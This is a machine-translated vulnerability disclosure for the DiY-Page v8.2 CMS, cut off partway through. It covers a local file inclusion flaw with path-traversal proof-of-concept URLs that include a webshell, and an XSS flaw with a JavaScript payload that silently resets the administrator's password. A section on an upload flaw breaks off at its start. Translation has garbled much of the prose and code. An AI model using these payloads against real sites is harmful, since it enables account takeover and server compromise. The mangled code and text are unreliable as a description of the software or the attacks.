Front someone studied DiY - sqlInj vulnerability analysis posts brief, I followed read read code, found DiY - v8.2 program is still exist many brief loopholes, including local files in contain bugs, and upload loophole, cross site loophole, etc..

A, local files contain bugs

/ / js. PHP

$incfile = PATH_PRE pelerinage mod / '. $_GET [' mod ']. '/ js /'. $_GET [' name ']. '. PHP ';

If (include $incfile)!!!!! Dperror ($l_error [' cant_include '], $incfile, true);

This loophole is quite obvious, if GPC to off, could have through the upload attachments contain, but programs and in close GPC using addslashes function filtering.

We can also through several long filename truncation, or uploading a webshell thereof to/TMP folder contains.

POC:

http://127.0.0.1/diypage/js.php? Mod = dpuser&name =.. /.. /.. / up / 201102/20110213_dd7ec931179c4dcb6a8ffb8b8786d20b_17872a. TXT. File / / / / / / / / / / / / / / / / /

http://127.0.0.1/diypage/js.php? Mod = dpuser&name =.. /.. /.. /.. / TMP/shells

B, XSS cross site loophole

Cross site is more, absolutely no filtering, similar code:

If ($_POST [' issubmit '] = = true) {

$fidarray = trim ($_POST [' fidarray '], ' ', ");

$backurl = 'javascript: promote. Go (-1); ';

$actionurlold = $actionurl;

$actionurl. = '& list&cataid do = ='. $_GET [' cataid '];

$entrytitle = $_POST [' entrytitle '];

$entrycontent = $_POST [' entrycontent '];

$entrytag = trim ($_POST [' entrytag ']);

...

Can the title in release entries in this XSS write js across this is also cross the backstage.

Since had XSS, can do things a lot, such as hijacking user, stealing COOKIE, improve access, writing shells, below is administrator password reset the js:

Varxmlhttp = false;

If (XMLHttpRequest) {well.

XMLHTTP = newXMLHttpRequest ();

Elseif (well. ActiveXObject have_to-open) {

XMLHTTP = newActiveXObject (" Msxml2. XMLHTTP ");

If (! XMLHTTP) {XMLHTTP = newActiveXObject (" Microsoft. XMLHTTP "); }

}

Varaction = "/ diypage/admin. Modcp&formod PHP? Mod dpuser&item = = = useradm&do = edit&uid = 1 & brief = 1 & perpage = 20";

Vardata = "gid = 2 & oldgid = 2 & dpusername admin&dpusernewpassword = cnryan&usertpl = = ® IP = & loginip = & dpuseremail = & dpusermoney = 0 & dpuserintro = & avatar = default. Gif&nickname = & issubmit = true";

XMLHTTP. Open (" POST ", action, false);

SetRequestHeader (' by j XMLHTTP - Type ', 'apply/x - WWW - urlencoded'); form -

XMLHTTP. Send (data);

C, upload loophole

DiY - get_upload_filename upload attachments brief treatment function are as follows: RIPS, code

/ inc/func. PHP

Functionget_upload_filename ($realname) {